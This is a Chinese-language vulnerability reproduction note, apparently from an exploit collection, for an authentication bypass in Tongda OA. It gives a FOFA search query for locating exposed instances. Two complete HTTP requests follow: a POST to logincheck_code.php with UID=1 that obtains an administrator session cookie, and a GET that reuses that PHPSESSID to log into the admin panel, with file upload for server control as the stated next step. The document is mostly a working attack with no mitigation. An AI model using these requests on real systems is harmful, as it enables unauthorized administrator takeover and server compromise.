T10-30通达-OA-PermissionAC

漏洞描述：

攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

网站图片:

网络测绘:

fofa语法：

app.name=“通达 OA”

漏洞复现:

获取cookie

/logincheck_code.php
post请求提交 "CODEUID={code_uid}&UID=1"，获取cookie

数据包

POST /logincheck_code.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

CODEUID={546DF670-FBDB-251D-D4AA-CD5C6C976592}&UID=1

利用获取到的cookie登陆系统

/general/index.php?is_modify_pwd=1

使用上一步获取到的cookie中的PHPSESSID字段替换cookie进行登录

GET /general/index.php?is_modify_pwd=1 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=afni33n5if6hi6s26i3b2h79j3;
Connection: close